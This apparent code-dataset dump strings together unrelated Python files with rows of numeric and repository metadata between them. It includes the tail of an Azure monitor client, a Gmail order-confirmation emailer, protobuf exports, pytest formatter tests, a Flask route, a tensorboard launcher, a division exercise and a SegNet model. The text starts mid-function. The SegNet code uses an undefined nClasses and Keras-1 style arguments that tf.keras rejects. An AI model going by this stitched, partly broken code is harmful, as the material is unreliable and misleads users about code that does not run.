request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.DefaultError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Monitor', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceNamespace}/{resourceType}/{resourceName}/providers/Microsoft.WorkloadMonitor/monitors/{monitorId}'} # type: ignore
def list_state_changes(
self,
subscription_id, # type: str
resource_group_name, # type: str
resource_namespace, # type: str
resource_type, # type: str
resource_name, # type: str
monitor_id, # type: str
filter=None, # type: Optional[str]
expand=None, # type: Optional[str]
start_timestamp_utc=None, # type: Optional[datetime.datetime]
end_timestamp_utc=None, # type: Optional[datetime.datetime]
**kwargs # type: Any
):
# type: (...) -> Iterable["models.MonitorStateChangeList"]
"""Get history of a monitor of a resource (with optional filter).
Get history of a monitor of a resource (with optional filter).
:param subscription_id: The subscriptionId of the resource.
:type subscription_id: str
:param resource_group_name: The resourceGroupName of the resource.
:type resource_group_name: str
:param resource_namespace: The resourceNamespace of the resource.
:type resource_namespace: str
:param resource_type: The resourceType of the resource.
:type resource_type: str
:param resource_name: The resourceType of the resource.
:type resource_name: str
:param monitor_id: The monitorId of the resource (url encoded).
:type monitor_id: str
:param filter: list example: $filter=monitorName eq 'logical-disks|C:|disk-free-space-mb';
history example: $filter=isHeartbeat eq false.
:type filter: str
:param expand: ex: $expand=evidence,configuration.
:type expand: str
:param start_timestamp_utc: The start Timestamp for the desired history.
:type start_timestamp_utc: ~datetime.datetime
:param end_timestamp_utc: The end Timestamp for the desired history.
:type end_timestamp_utc: ~datetime.datetime
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either MonitorStateChangeList or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~workload_monitor_api.models.MonitorStateChangeList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MonitorStateChangeList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-01-13-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_state_changes.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("subscription_id", subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'resourceNamespace': self._serialize.url("resource_namespace", resource_namespace, 'str'),
'resourceType': self._serialize.url("resource_type", resource_type, 'str'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'monitorId': self._serialize.url("monitor_id", monitor_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
if start_timestamp_utc is not None:
query_parameters['startTimestampUtc'] = self._serialize.query("start_timestamp_utc", start_timestamp_utc, 'iso-8601')
if end_timestamp_utc is not None:
query_parameters['endTimestampUtc'] = self._serialize.query("end_timestamp_utc", end_timestamp_utc, 'iso-8601')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('MonitorStateChangeList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.DefaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_state_changes.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceNamespace}/{resourceType}/{resourceName}/providers/Microsoft.WorkloadMonitor/monitors/{monitorId}/history'} # type: ignore
def get_state_change(
self,
subscription_id, # type: str
resource_group_name, # type: str
resource_namespace, # type: str
resource_type, # type: str
resource_name, # type: str
monitor_id, # type: str
timestamp_unix, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "models.MonitorStateChange"
"""Get the status of a monitor at a specific timestamp in history.
Get the status of a monitor at a specific timestamp in history.
:param subscription_id: The subscriptionId of the resource.
:type subscription_id: str
:param resource_group_name: The resourceGroupName of the resource.
:type resource_group_name: str
:param resource_namespace: The resourceNamespace of the resource.
:type resource_namespace: str
:param resource_type: The resourceType of the resource.
:type resource_type: str
:param resource_name: The resourceType of the resource.
:type resource_name: str
:param monitor_id: The monitorId of the resource (url encoded).
:type monitor_id: str
:param timestamp_unix: The timestamp of the state change (Unix format).
:type timestamp_unix: str
:param expand: ex: $expand=evidence,configuration.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MonitorStateChange, or the result of cls(response)
:rtype: ~workload_monitor_api.models.MonitorStateChange
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MonitorStateChange"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-01-13-preview"
accept = "application/json"
# Construct URL
url = self.get_state_change.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("subscription_id", subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'resourceNamespace': self._serialize.url("resource_namespace", resource_namespace, 'str'),
'resourceType': self._serialize.url("resource_type", resource_type, 'str'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'monitorId': self._serialize.url("monitor_id", monitor_id, 'str'),
'timestampUnix': self._serialize.url("timestamp_unix", timestamp_unix, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.DefaultError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MonitorStateChange', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_state_change.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceNamespace}/{resourceType}/{resourceName}/providers/Microsoft.WorkloadMonitor/monitors/{monitorId}/history/{timestampUnix}'} # type: ignore
| 49.967442
| 266
| 0.65289
| 2,309
| 21,486
| 5.886964
| 0.104374
| 0.039211
| 0.02825
| 0.025013
| 0.838226
| 0.834841
| 0.826675
| 0.814905
| 0.814905
| 0.814905
| 0
| 0.005485
| 0.244764
| 21,486
| 429
| 267
| 50.083916
| 0.832193
| 0.320069
| 0
| 0.780488
| 0
| 0.01626
| 0.153919
| 0.056328
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044715
| false
| 0
| 0.04065
| 0
| 0.142276
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3b109a272de18300d316a05397d669cdde61677c
| 3,616
|
py
|
Python
|
src/autoemail.py
|
elenirotsides/Exchange4Students
|
33248c6486d1f1bade4ab0fa52f2b77c966cfbd3
|
[
"MIT"
] | null | null | null |
src/autoemail.py
|
elenirotsides/Exchange4Students
|
33248c6486d1f1bade4ab0fa52f2b77c966cfbd3
|
[
"MIT"
] | 48
|
2021-03-22T22:34:20.000Z
|
2021-05-05T15:55:33.000Z
|
src/autoemail.py
|
elenirotsides/Exchange4Students
|
33248c6486d1f1bade4ab0fa52f2b77c966cfbd3
|
[
"MIT"
] | null | null | null |
import smtplib
import os
import ssl
import app
def email_buyer(email_add, first, last, item, price, seller, location, time, address, country, state, zipcode):
PORT = 465 # For SSL. Have to use port 465 for gmail SSL
password = os.environ.get("D6_PASSWORD")
SENDER_EMAIL = "exchange4studentsd6@gmail.com"
SUBJECT = "Exchange4Students Order Confirmation"
RECEIVER_EMAIL = email_add
# RECEIVER_EMAIL = order_info["email"]
if(address is None):
TEXT = f"""\n
Subject: Order Confirmation\n
Dear {first} {last},
This is to confirm your purchase!
Below is your order information:
Item: {item}
Price: {price}
-----------------------------------------------------------
Seller: {seller}
Location: {location}
Time: {time}
-Exchange4Students
"""
else:
TEXT = f"""\n
Subject: Order Confirmation\n
Dear {first} {last},
This is to confirm your purchase!
Below is your order information:
Item: {item}
Price: {price}
-------------------------------------------------------------
Seller: {seller}
Address: {address}
State: {state}
Zipcode: {zipcode}
Country: {country}
-Exchange4Students
"""
MESSAGE = 'Subject: {}\n\n{}'.format(SUBJECT, TEXT)
# Create a secure SSL context
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", PORT, context=context) as server:
server.login("exchange4studentsd6@gmail.com", password)
# TODO: Send email here
server.sendmail(SENDER_EMAIL, RECEIVER_EMAIL, MESSAGE)
def email_seller(seller, buyer_first, buyer_last, venmo, buyer_email, item, location,
time, address, country, state, zipcode):
PORT = 465 # For SSL. Have to use port 465 for gmail SSL
password = os.environ.get("D6_PASSWORD")
SENDER_EMAIL = "exchange4studentsd6@gmail.com"
SUBJECT = "Exchange4Students Order Confirmation"
RECEIVER_EMAIL = seller
if(address is None):
TEXT = f"""\n
Subject: Order Confirmation\n
Dear user,
Someone bought your item!
Below is the order information:
Item: {item}
Buyer Name: {buyer_first} {buyer_last}
Email: {buyer_email}
Venmo: {venmo}
Location: {location}
Time: {time}
Sincerely,
Exchange4students
"""
else:
TEXT= f"""\n
Subject: Order Confirmation\n
Dear user,
Someone bought your item!
Below is the order information:
Item: {item}
Buyer Name: {buyer_first} {buyer_last}
Email: {buyer_email}
Venmo: {venmo}
Address: {address}
State: {state}
Zipcode: {zipcode}
Country: {country}
Sincerely,
Exchange4students
"""
MESSAGE = 'Subject: {}\n\n{}'.format(SUBJECT, TEXT)
# Create a secure SSL context
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", PORT, context=context) as server:
server.login("exchange4studentsd6@gmail.com", password)
# TODO: Send email here
server.sendmail(SENDER_EMAIL, RECEIVER_EMAIL, MESSAGE)
| 27.603053
| 111
| 0.536504
| 356
| 3,616
| 5.36236
| 0.216292
| 0.025144
| 0.020953
| 0.027239
| 0.869565
| 0.869565
| 0.869565
| 0.869565
| 0.815086
| 0.815086
| 0
| 0.011785
| 0.34292
| 3,616
| 130
| 112
| 27.815385
| 0.791667
| 0.061947
| 0
| 0.876404
| 0
| 0
| 0.63682
| 0.06974
| 0
| 0
| 0
| 0.007692
| 0
| 1
| 0.022472
| false
| 0.044944
| 0.044944
| 0
| 0.067416
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3b5515b48f6853b1078b277bdd2f191487995f57
| 782
|
py
|
Python
|
temporalio/api/errordetails/v1/__init__.py
|
cretz/temporal-sdk-python
|
431ca1967d365556a9cf5aa9aac00243b71059f8
|
[
"MIT"
] | 55
|
2022-01-31T22:02:22.000Z
|
2022-03-30T11:17:21.000Z
|
temporalio/api/errordetails/v1/__init__.py
|
cretz/temporal-sdk-python
|
431ca1967d365556a9cf5aa9aac00243b71059f8
|
[
"MIT"
] | 7
|
2022-02-04T14:08:46.000Z
|
2022-03-22T13:27:30.000Z
|
temporalio/api/errordetails/v1/__init__.py
|
cretz/temporal-sdk-python
|
431ca1967d365556a9cf5aa9aac00243b71059f8
|
[
"MIT"
] | 4
|
2022-01-31T17:31:49.000Z
|
2022-03-29T01:04:46.000Z
|
from .message_pb2 import (
CancellationAlreadyRequestedFailure,
ClientVersionNotSupportedFailure,
NamespaceAlreadyExistsFailure,
NamespaceNotActiveFailure,
NotFoundFailure,
PermissionDeniedFailure,
QueryFailedFailure,
ResourceExhaustedFailure,
ServerVersionNotSupportedFailure,
SystemWorkflowFailure,
WorkflowExecutionAlreadyStartedFailure,
)
__all__ = [
"CancellationAlreadyRequestedFailure",
"ClientVersionNotSupportedFailure",
"NamespaceAlreadyExistsFailure",
"NamespaceNotActiveFailure",
"NotFoundFailure",
"PermissionDeniedFailure",
"QueryFailedFailure",
"ResourceExhaustedFailure",
"ServerVersionNotSupportedFailure",
"SystemWorkflowFailure",
"WorkflowExecutionAlreadyStartedFailure",
]
| 27.928571
| 45
| 0.782609
| 27
| 782
| 22.481481
| 0.592593
| 0.220758
| 0.31631
| 0.398682
| 0.962109
| 0.962109
| 0.962109
| 0.962109
| 0.962109
| 0.962109
| 0
| 0.001511
| 0.153453
| 782
| 27
| 46
| 28.962963
| 0.915408
| 0
| 0
| 0
| 0
| 0
| 0.373402
| 0.331202
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.038462
| 0
| 0.038462
| 0
| 1
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
8ea85bdedcf33b83900f9de3aa54e5f79da03f83
| 6,929
|
py
|
Python
|
tests/test_ci_output_parser/test_formatter.py
|
lzbrooks/ci_output_parser
|
4487204473ff61df9a0d9a4224dcf55765c6e0c8
|
[
"MIT"
] | null | null | null |
tests/test_ci_output_parser/test_formatter.py
|
lzbrooks/ci_output_parser
|
4487204473ff61df9a0d9a4224dcf55765c6e0c8
|
[
"MIT"
] | null | null | null |
tests/test_ci_output_parser/test_formatter.py
|
lzbrooks/ci_output_parser
|
4487204473ff61df9a0d9a4224dcf55765c6e0c8
|
[
"MIT"
] | null | null | null |
import pytest
from ci_output_parser import formatter
def test_format_lint_lines_with_valid_line(valid_lint_lines, valid_lint_format):
lint_lines = formatter.format_lint_lines(valid_lint_format.get("parser_name"),
[valid_lint_lines.get("doxygen_lint")],
valid_lint_lines.get("cmake_lint"))
assert len(lint_lines) == 9
assert valid_lint_lines.get("cmake_lint")[0] == lint_lines[0]
assert valid_lint_format.get("header_divider") == lint_lines[3]
assert valid_lint_format.get("parser_name_formatted") == lint_lines[4]
assert valid_lint_format.get("header_divider") == lint_lines[5]
assert valid_lint_format.get("lint_comment_block") == lint_lines[6]
assert valid_lint_lines.get("doxygen_lint") == lint_lines[7]
assert valid_lint_format.get("lint_comment_block") == lint_lines[8]
def test_format_lint_lines_with_empty_lint_log_lines(valid_lint_lines, valid_lint_format):
lint_lines = formatter.format_lint_lines(valid_lint_format.get("parser_name"),
[valid_lint_lines.get("doxygen_lint")],
[])
assert len(lint_lines) == 6
assert valid_lint_format.get("header_divider") == lint_lines[0]
assert valid_lint_format.get("parser_name_formatted") == lint_lines[1]
assert valid_lint_format.get("header_divider") == lint_lines[2]
assert valid_lint_format.get("lint_comment_block") == lint_lines[3]
assert valid_lint_lines.get("doxygen_lint") == lint_lines[4]
assert valid_lint_format.get("lint_comment_block") == lint_lines[5]
def test_format_lint_lines_with_no_lint_log_lines(valid_lint_lines, valid_lint_format):
lint_lines = formatter.format_lint_lines(valid_lint_format.get("parser_name"),
[valid_lint_lines.get("doxygen_lint")])
assert len(lint_lines) == 6
assert valid_lint_format.get("header_divider") == lint_lines[0]
assert valid_lint_format.get("parser_name_formatted") == lint_lines[1]
assert valid_lint_format.get("header_divider") == lint_lines[2]
assert valid_lint_format.get("lint_comment_block") == lint_lines[3]
assert valid_lint_lines.get("doxygen_lint") == lint_lines[4]
assert valid_lint_format.get("lint_comment_block") == lint_lines[5]
def test_format_lint_lines_with_no_parser_lint(valid_lint_lines, valid_lint_format):
lint_lines = formatter.format_lint_lines(valid_lint_format.get("parser_name"),
[],
[])
assert len(lint_lines) == 6
assert valid_lint_format.get("header_divider") == lint_lines[0]
assert valid_lint_format.get("parser_name_formatted") == lint_lines[1]
assert valid_lint_format.get("header_divider") == lint_lines[2]
assert valid_lint_format.get("lint_comment_block") == lint_lines[3]
assert valid_lint_lines.get("no_errors_report") == lint_lines[4]
assert valid_lint_format.get("lint_comment_block") == lint_lines[5]
def test_format_lint_lines_with_no_parser_name(valid_lint_lines, valid_lint_format):
lint_lines = formatter.format_lint_lines("", [], [])
assert len(lint_lines) == 6
assert valid_lint_format.get("header_divider") == lint_lines[0]
assert valid_lint_format.get("no_parser_name_formatted") == lint_lines[1]
assert valid_lint_format.get("header_divider") == lint_lines[2]
assert valid_lint_format.get("lint_comment_block") == lint_lines[3]
assert valid_lint_lines.get("no_errors_report") == lint_lines[4]
assert valid_lint_format.get("lint_comment_block") == lint_lines[5]
def test_format_lint_error_lines_with_valid_line(valid_lint_lines, valid_lint_format):
lint_lines = formatter.format_lint_error_lines([valid_lint_lines.get("doxygen_lint")],
valid_lint_lines.get("cmake_lint"))
assert len(lint_lines) == 6
assert valid_lint_lines.get("cmake_lint")[0] == lint_lines[0]
assert valid_lint_format.get("lint_comment_block") == lint_lines[3]
assert valid_lint_lines.get("doxygen_lint") == lint_lines[4]
assert valid_lint_format.get("lint_comment_block") == lint_lines[5]
def test_format_lint_error_lines_with_empty_lint_log_lines(valid_lint_lines, valid_lint_format):
lint_lines = formatter.format_lint_error_lines([valid_lint_lines.get("doxygen_lint")], [])
assert len(lint_lines) == 3
assert valid_lint_format.get("lint_comment_block") == lint_lines[0]
assert valid_lint_lines.get("doxygen_lint") == lint_lines[1]
assert valid_lint_format.get("lint_comment_block") == lint_lines[2]
def test_format_lint_error_lines_with_no_lint_log_lines(valid_lint_lines, valid_lint_format):
with pytest.raises(AttributeError):
formatter.format_lint_error_lines([valid_lint_lines.get("doxygen_lint")], None)
def test_format_lint_error_lines_with_no_parser_lint(valid_lint_lines, valid_lint_format):
lint_lines = formatter.format_lint_error_lines([], [])
assert len(lint_lines) == 3
assert valid_lint_format.get("lint_comment_block") == lint_lines[0]
assert valid_lint_lines.get("no_errors_report") == lint_lines[1]
assert valid_lint_format.get("lint_comment_block") == lint_lines[2]
def test_format_lint_title_with_valid_parser_name_and_log_lines(valid_lint_lines, valid_lint_format):
lint_lines = formatter.format_lint_title(valid_lint_format.get("parser_name"),
valid_lint_lines.get("cmake_lint"))
assert len(lint_lines) == 6
assert valid_lint_lines.get("cmake_lint")[0] == lint_lines[0]
assert valid_lint_format.get("header_divider") == lint_lines[3]
assert valid_lint_format.get("parser_name_formatted") == lint_lines[4]
assert valid_lint_format.get("header_divider") == lint_lines[5]
def test_format_lint_title_with_empty_lint_log_lines(valid_lint_lines, valid_lint_format):
lint_lines = formatter.format_lint_title(valid_lint_format.get("parser_name"), [])
assert len(lint_lines) == 3
assert valid_lint_format.get("header_divider") == lint_lines[0]
assert valid_lint_format.get("parser_name_formatted") == lint_lines[1]
assert valid_lint_format.get("header_divider") == lint_lines[2]
def test_format_lint_title_with_no_lint_log_lines(valid_lint_lines, valid_lint_format):
with pytest.raises(AttributeError):
formatter.format_lint_title(valid_lint_format.get("parser_name"), None)
def test_format_lint_title_with_no_parser_name(valid_lint_lines, valid_lint_format):
lint_lines = formatter.format_lint_title("", [])
assert len(lint_lines) == 3
assert valid_lint_format.get("header_divider") == lint_lines[0]
assert valid_lint_format.get("no_parser_name_formatted") == lint_lines[1]
assert valid_lint_format.get("header_divider") == lint_lines[2]
| 53.713178
| 101
| 0.732285
| 995
| 6,929
| 4.60804
| 0.047236
| 0.227699
| 0.196292
| 0.184515
| 0.985605
| 0.98386
| 0.975354
| 0.966848
| 0.960742
| 0.942203
| 0
| 0.011157
| 0.159186
| 6,929
| 128
| 102
| 54.132813
| 0.775832
| 0
| 0
| 0.683168
| 0
| 0
| 0.144754
| 0.025112
| 0
| 0
| 0
| 0
| 0.613861
| 1
| 0.128713
| false
| 0
| 0.019802
| 0
| 0.148515
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
8ed0e97d949c43ee6f4bff63987515e5d1609de1
| 189
|
py
|
Python
|
app/routes.py
|
hallowf/GameSaveBackups-flask-static
|
5ceaaf61eaa67f27d03864d9710f34b7384bf7c1
|
[
"CNRI-Python"
] | null | null | null |
app/routes.py
|
hallowf/GameSaveBackups-flask-static
|
5ceaaf61eaa67f27d03864d9710f34b7384bf7c1
|
[
"CNRI-Python"
] | null | null | null |
app/routes.py
|
hallowf/GameSaveBackups-flask-static
|
5ceaaf61eaa67f27d03864d9710f34b7384bf7c1
|
[
"CNRI-Python"
] | null | null | null |
from flask import Flask, render_template, Response, send_file, request, jsonify
from app import app
### Page routes
@app.route("/")
def index():
return render_template("index.html")
| 18.9
| 79
| 0.730159
| 26
| 189
| 5.192308
| 0.692308
| 0.207407
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 189
| 9
| 80
| 21
| 0.838509
| 0.058201
| 0
| 0
| 0
| 0
| 0.063218
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
8ede233dcd188e68bcd1525cbf27f0621d92b178
| 293
|
py
|
Python
|
raisimGymTorch/raisimGymTorch/env/envs/rsg_ouzel_delta/scripts/tensorboard_launch.py
|
vschorp/raisimLib
|
387784292d9acf97a202e9ec6bad0434b0ff3f39
|
[
"Apache-2.0"
] | null | null | null |
raisimGymTorch/raisimGymTorch/env/envs/rsg_ouzel_delta/scripts/tensorboard_launch.py
|
vschorp/raisimLib
|
387784292d9acf97a202e9ec6bad0434b0ff3f39
|
[
"Apache-2.0"
] | null | null | null |
raisimGymTorch/raisimGymTorch/env/envs/rsg_ouzel_delta/scripts/tensorboard_launch.py
|
vschorp/raisimLib
|
387784292d9acf97a202e9ec6bad0434b0ff3f39
|
[
"Apache-2.0"
] | null | null | null |
import os
from raisimGymTorch.helper.raisim_gym_helper import ConfigurationSaver, tensorboard_launcher
tensorboard_launcher("/home/vincent/rl_4_aerial_manipulator/catkin_ws/src/raisimLib/raisimGymTorch/data/ouzel_delta_planning")
# tensorboard_launcher("/home/vincent/ouzel_delta_planning")
| 41.857143
| 126
| 0.877133
| 36
| 293
| 6.777778
| 0.666667
| 0.233607
| 0.188525
| 0.245902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003559
| 0.040956
| 293
| 6
| 127
| 48.833333
| 0.864769
| 0.197952
| 0
| 0
| 0
| 0
| 0.437768
| 0.437768
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d9236bd6bf0c3d0e232db0699d80ef9669dca405
| 62
|
py
|
Python
|
Cisco/2.1.3.4.py
|
martageraldo/aula-python-cisco
|
6f4061c4200bb611f90a4231e1646ae8a0066e99
|
[
"MIT"
] | null | null | null |
Cisco/2.1.3.4.py
|
martageraldo/aula-python-cisco
|
6f4061c4200bb611f90a4231e1646ae8a0066e99
|
[
"MIT"
] | null | null | null |
Cisco/2.1.3.4.py
|
martageraldo/aula-python-cisco
|
6f4061c4200bb611f90a4231e1646ae8a0066e99
|
[
"MIT"
] | null | null | null |
print(6 // 3)
print(6 // 3.)
print(6. // 3)
print(6. // 3.)
| 15.5
| 15
| 0.451613
| 12
| 62
| 2.333333
| 0.25
| 0.857143
| 1
| 1.285714
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0.166667
| 0.225806
| 62
| 4
| 16
| 15.5
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 13
|
79992efeb846fa5a9fa514cb1ac31b8eb994a72a
| 2,912
|
py
|
Python
|
Chapter05/1_segnet.py
|
yasin-gh/Deep-Learning-for-Computer-Vision
|
d5b3e153369018029270a6a47349ee8ce7c7641e
|
[
"MIT"
] | 200
|
2018-01-23T16:00:19.000Z
|
2022-03-26T09:28:48.000Z
|
Chapter05/1_segnet.py
|
yasin-gh/Deep-Learning-for-Computer-Vision
|
d5b3e153369018029270a6a47349ee8ce7c7641e
|
[
"MIT"
] | 11
|
2018-06-13T07:50:40.000Z
|
2020-10-13T05:28:12.000Z
|
Chapter05/1_segnet.py
|
yasin-gh/Deep-Learning-for-Computer-Vision
|
d5b3e153369018029270a6a47349ee8ce7c7641e
|
[
"MIT"
] | 163
|
2018-01-24T02:38:52.000Z
|
2022-01-13T20:23:17.000Z
|
import tensorflow as tf
input_height = 360
input_width = 480
kernel = 3
filter_size = 64
pad = 1
pool_size = 2
model = tf.keras.models.Sequential()
model.add(tf.keras.layers.Layer(input_shape=(3, input_height, input_width)))
# encoder
model.add(tf.keras.layers.ZeroPadding2D(padding=(pad, pad)))
model.add(tf.keras.layers.Conv2D(filter_size, kernel, kernel, border_mode='valid'))
model.add(tf.keras.layers.BatchNormalization())
model.add(tf.keras.layers.Activation('relu'))
model.add(tf.keras.layers.MaxPooling2D(pool_size=(pool_size, pool_size)))
model.add(tf.keras.layers.ZeroPadding2D(padding=(pad, pad)))
model.add(tf.keras.layers.Conv2D(128, kernel, kernel, border_mode='valid'))
model.add(tf.keras.layers.BatchNormalization())
model.add(tf.keras.layers.Activation('relu'))
model.add(tf.keras.layers.MaxPooling2D(pool_size=(pool_size, pool_size)))
model.add(tf.keras.layers.ZeroPadding2D(padding=(pad, pad)))
model.add(tf.keras.layers.Conv2D(256, kernel, kernel, border_mode='valid'))
model.add(tf.keras.layers.BatchNormalization())
model.add(tf.keras.layers.Activation('relu'))
model.add(tf.keras.layers.MaxPooling2D(pool_size=(pool_size, pool_size)))
model.add(tf.keras.layers.ZeroPadding2D(padding=(pad, pad)))
model.add(tf.keras.layers.Conv2D(512, kernel, kernel, border_mode='valid'))
model.add(tf.keras.layers.BatchNormalization())
model.add(tf.keras.layers.Activation('relu'))
# decoder
model.add(tf.keras.layers.ZeroPadding2D(padding=(pad, pad)))
model.add(tf.keras.layers.Conv2D(512, kernel, kernel, border_mode='valid'))
model.add(tf.keras.layers.BatchNormalization())
model.add(tf.keras.layers.UpSampling2D(size=(pool_size, pool_size)))
model.add(tf.keras.layers.ZeroPadding2D(padding=(pad, pad)))
model.add(tf.keras.layers.Conv2D(256, kernel, kernel, border_mode='valid'))
model.add(tf.keras.layers.BatchNormalization())
model.add(tf.keras.layers.UpSampling2D(size=(pool_size, pool_size)))
model.add(tf.keras.layers.ZeroPadding2D(padding=(pad, pad)))
model.add(tf.keras.layers.Conv2D(128, kernel, kernel, border_mode='valid'))
model.add(tf.keras.layers.BatchNormalization())
model.add(tf.keras.layers.UpSampling2D(size=(pool_size, pool_size)))
model.add(tf.keras.layers.ZeroPadding2D(padding=(pad, pad)))
model.add(tf.keras.layers.Conv2D(filter_size, kernel, kernel, border_mode='valid'))
model.add(tf.keras.layers.BatchNormalization())
model.add(tf.keras.layers.Conv2D(nClasses, 1, 1, border_mode='valid', ))
model.outputHeight = model.output_shape[-2]
model.outputWidth = model.output_shape[-1]
